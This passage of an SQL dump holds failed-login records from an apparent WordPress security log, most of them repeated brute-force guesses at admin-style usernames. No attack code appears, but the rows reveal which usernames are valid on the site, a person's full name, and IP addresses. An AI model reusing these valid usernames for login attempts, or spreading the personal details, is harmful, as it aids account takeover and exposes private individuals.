(99479, 1493126386.592271, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 534420026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99480, 1493126389.607128, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 534420026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99481, 1493126956.229665, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3167951747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99482, 1493126957.329731, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3167951747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99483, 1493127875.985981, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 609050352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99484, 1493127878.304189, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 609050352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99485, 1493132339.289717, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1293756220, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99486, 1493135589.981152, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1938229159, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99487, 1493135591.613757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1938229159, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99488, 1493135802.634101, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 456761165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99489, 1493135805.134268, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 456761165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99490, 1493139944.462680, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99491, 1493140445.710075, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3412935119, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99492, 1493140447.059792, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3412935119, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99493, 1493140510.656040, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99494, 1493141070.160433, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99495, 1493141221.554832, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702589396, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99496, 1493141825.286031, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99497, 1493142142.883487, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2038180494, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99498, 1493142145.515538, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2038180494, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(99499, 1493142764.802831, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99500, 1493143716.226437, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99501, 1493144688.263825, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99502, 1493145635.018631, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99503, 1493146602.638646, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99504, 1493146784.079208, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1572107495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99505, 1493146785.916818, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1572107495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99506, 1493146806.497838, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742066674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99507, 1493146807.972560, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742066674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99508, 1493147556.220274, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99509, 1493148514.861478, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99510, 1493149452.434113, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99511, 1493150409.444203, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99512, 1493151347.051127, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99513, 1493152168.310479, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3017071845, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99514, 1493152292.718131, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99515, 1493152919.695548, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419297473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99516, 1493152921.620875, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419297473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99517, 1493153084.984605, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991534124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99518, 1493153086.044922, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991534124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99519, 1493153221.601201, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99520, 1493153389.273865, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3321521735, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99521, 1493153390.729604, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3321521735, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99522, 1493154136.404367, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99523, 1493155087.247995, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99524, 1493156022.676183, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99525, 1493158161.305216, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1940335041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99526, 1493158162.739488, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1940335041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99527, 1493158682.897042, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2957549377, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99528, 1493163212.752834, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1565928623, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99529, 1493163304.923701, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1318488388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99530, 1493163307.135378, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1318488388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99531, 1493163836.102864, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1938114477, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99532, 1493163837.752611, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1938114477, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99533, 1493165930.870027, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3182212288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99534, 1493168329.653026, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1223522106, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99535, 1493169152.921648, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1590804861, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99536, 1493171657.831037, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99537, 1493172615.028244, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99538, 1493173589.673707, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99539, 1493174545.616777, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99540, 1493176136.886277, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99541, 1493176793.919308, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3360841433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99542, 1493177089.265276, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99543, 1493178027.558960, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99544, 1493178039.960202, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741414545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99545, 1493178044.650879, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741414545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99546, 1493178983.125953, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99547, 1493179926.476166, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99548, 1493180924.421735, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99549, 1493181817.084668, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3383524734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99550, 1493181818.346708, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3383524734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99551, 1493181935.063475, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99552, 1493182958.183617, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99553, 1493183976.208673, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99554, 1493184974.377329, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99555, 1493185984.641289, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99556, 1493186993.286969, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99557, 1493188025.877518, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99558, 1493188933.931757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1963147486, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99559, 1493188936.389724, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1963147486, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99560, 1493189046.824289, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99561, 1493190061.404720, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99562, 1493195192.799062, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 832022104, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99563, 1493195703.916775, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657625553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99564, 1493195705.645021, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657625553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99565, 1493196028.472537, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 995909574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99566, 1493196030.212352, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 995909574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99567, 1493196342.533121, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742337306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99568, 1493196343.839655, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742337306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99569, 1493197084.433285, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1995212473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99570, 1493197085.856986, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1995212473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99571, 1493197801.354325, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702781337, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99572, 1493198050.668823, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 241309309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99573, 1493198052.930812, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 241309309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99574, 1493199694.397718, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1028683009, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99575, 1493199695.907478, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1028683009, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99576, 1493200495.433788, 1, 'loginFailValidUsername', 'julie', 2, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99577, 1493200497.028295, 1, 'loginFailValidUsername', 'julie', 2, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99578, 1493200498.745923, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99579, 1493200500.418658, 1, 'loginFailValidUsername', 'pablo', 3, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99580, 1493200502.116464, 1, 'loginFailValidUsername', 'admin', 1, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99581, 1493201516.522809, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892330172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99582, 1493201518.520897, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892330172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99583, 1493206386.100198, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99584, 1493207423.043235, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99585, 1493207575.717109, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1054327665, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99586, 1493207576.976518, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1054327665, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99587, 1493209499.165092, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99588, 1493209585.861984, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741892031, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99589, 1493209587.085096, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741892031, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99590, 1493210545.087582, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99591, 1493211581.118971, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99592, 1493212182.683583, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3136357551, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99593, 1493212184.102935, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3136357551, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99594, 1493212595.671304, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99595, 1493213611.588829, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1856572143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99596, 1493213613.252578, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1856572143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99597, 1493213632.082424, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99598, 1493214660.505697, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99599, 1493215275.694368, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3557015878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99600, 1493215703.733647, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99601, 1493216472.816944, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835651188, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99602, 1493216739.615513, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99603, 1493217763.151734, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99604, 1493218946.020727, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1372304315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99605, 1493219880.345459, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99606, 1493220134.126870, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1977136493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99607, 1493220136.607693, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1977136493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99608, 1493220415.025531, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 609438027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99609, 1493220416.588498, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 609438027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99610, 1493220919.061253, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99611, 1493221933.638066, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99612, 1493222950.758087, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99613, 1493223994.869412, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99614, 1493225016.531627, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99615, 1493226048.229506, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99616, 1493227059.791461, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99617, 1493230809.791934, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99618, 1493230810.188788, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99619, 1493230810.519037, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99620, 1493230810.848155, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99621, 1493230811.390032, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99622, 1493230811.711376, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99623, 1493230812.034158, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
